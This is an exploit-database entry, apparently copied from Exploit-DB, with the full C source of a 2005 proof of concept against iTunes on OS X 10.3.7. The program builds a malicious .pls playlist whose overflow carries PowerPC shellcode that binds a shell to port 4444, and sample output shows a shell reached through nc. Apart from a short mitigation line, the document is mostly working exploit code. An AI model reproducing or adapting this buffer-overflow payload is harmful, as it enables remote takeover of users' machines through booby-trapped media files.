iTunes on OS X 10.3.7 Exploit

vendor:

iTunes

by:

nemo@felinemenace.org

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: iTunes

Affected Version From: iTunes on OS X 10.3.7

Affected Version To: iTunes on OS X 10.3.7

Patch Exists: NO

Related CWE:

CPE: a:apple:itunes:10.3.7

Metasploit:

Other Scripts:

Platforms Tested: OS X 10.3.7

iTunes on OS X 10.3.7 Exploit

Generates a .pls file that, when loaded in iTunes on OS X 10.3.7, binds a shell to port 4444. The shellcode used in the exploit does not contain any null or newline characters.

Mitigation:

Update to a patched version of iTunes. Avoid loading untrusted .pls files.

Source

Exploit-DB raw data:

/*
 * PoC for iTunes on OS X 10.3.7
 * -( nemo@felinemenace.org )-
 *
 * Generates a .pls file, when loaded in iTunes it
 * binds a shell to port 4444.
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@felinemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$ open foo.pls
 * -[nemo@gir:~]$ nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 *
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <strings.h>

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
        int n,*p;
        unsigned char * q;
        char buf[BUFSIZE];
        FILE *pls;
        int offset=0x3DA8;
        char playlist[] = {
                "[playlist]\n"
                "NumberOfEntries=1\n"
                "File1=http://"
        };
        printf("-( fm-eyetewnz )-\n");
        printf("-( nemo@felinemenace.org )-\n");
        memset(buf,'\x60',BUFSIZE);
        bcopy(shellcode, buf + (BUFSIZE - 44 - sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
        q = buf + sizeof(buf) - 5;
        p = (int *)q;
        if(!(av[1])) {
                printf("usage: %s <filename (.pls)> [offset]\n",*av);
                exit(1);
        }
        if(av[2])
                offset = atoi(av[2]);
        *p = (0xc0000000 - offset);// 0xbfffc258;
        if(!(pls = fopen(*(av+1),"w+"))) {
                printf("error opening file: %s.\n", *(av +1));
                exit(1);
        }
        printf("Creating file: %s.\n",*(av+1));
        printf("Bindshell on port: 4444\n");
        fwrite(playlist,sizeof(playlist) - 1,1,pls);
        fwrite(buf,sizeof(buf) - 1,1,pls);
        fclose(pls);
}

// milw0rm.com [2005-01-16]